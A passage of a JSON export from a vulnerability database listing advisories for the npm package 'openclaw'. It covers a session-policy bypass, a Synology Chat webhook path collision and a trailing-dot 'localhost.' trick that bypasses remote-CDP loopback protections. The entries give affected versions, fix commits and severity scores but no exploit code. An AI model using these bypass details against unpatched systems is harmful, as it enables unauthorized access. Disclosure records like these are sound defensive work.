session-policy bypass with unreleased fix, not a broader host-boundary break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d369a3400dc9b737fbe8daa63f09d909ce7beb8` — 2026-03-30T16:48:12+02:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75" }, { "reference_url": "https://github.com/advisories/GHSA-fwjq-xwfj-gv75", "reference_id": "GHSA-fwjq-xwfj-gv75", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fwjq-xwfj-gv75" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-fwjq-xwfj-gv75" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x7uw-s9a6-fybd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91235?format=api", "vulnerability_id": "VCID-x9qg-8qk5-s3d6", "summary": "OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n## Summary\nSynology Chat multi-account configuration could collapse onto a shared webhook path, replacing route ownership and bypassing per-account DM policy separation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `980940aa58f862da4e19372597bbc2a9f268d70b`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/accounts.ts now distinguishes inherited base webhook paths from explicit per-account paths.\n- extensions/synology-chat/src/gateway-runtime.ts now fails closed on inherited or duplicate webhook paths and registers routes without replacement.\n\nOpenClaw thanks @tdjackey for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35635", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13338", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.133", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13342", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35635" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat" }, { "reference_url": "https://github.com/advisories/GHSA-rqp8-q22p-5j9q", "reference_id": "GHSA-rqp8-q22p-5j9q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rqp8-q22p-5j9q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35635", "GHSA-rqp8-q22p-5j9q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x9qg-8qk5-s3d6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90049?format=api", "vulnerability_id": "VCID-xfgw-ua7r-abbr", "summary": "OpenClaw: Trailing-dot localhost CDP hosts could bypass remote loopback protections\n## Summary\n\nBefore OpenClaw 2026.4.2, remote CDP discovery could return a trailing-dot localhost host such as `localhost.` and bypass OpenClaw's loopback-host normalization. That let a non-loopback remote CDP profile pivot the follow-up connection back onto localhost.\n\n## Impact\n\nA hostile discovery response could retarget authenticated browser control toward a localhost-resolving endpoint on the OpenClaw host. This weakened the existing remote-CDP loopback protection and could expose localhost-backed browser state.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9c22d636697336a6b22b0ae24798d8b8325d7828` — normalize localhost absolute-form CDP hosts before loopback checks\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41372", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", 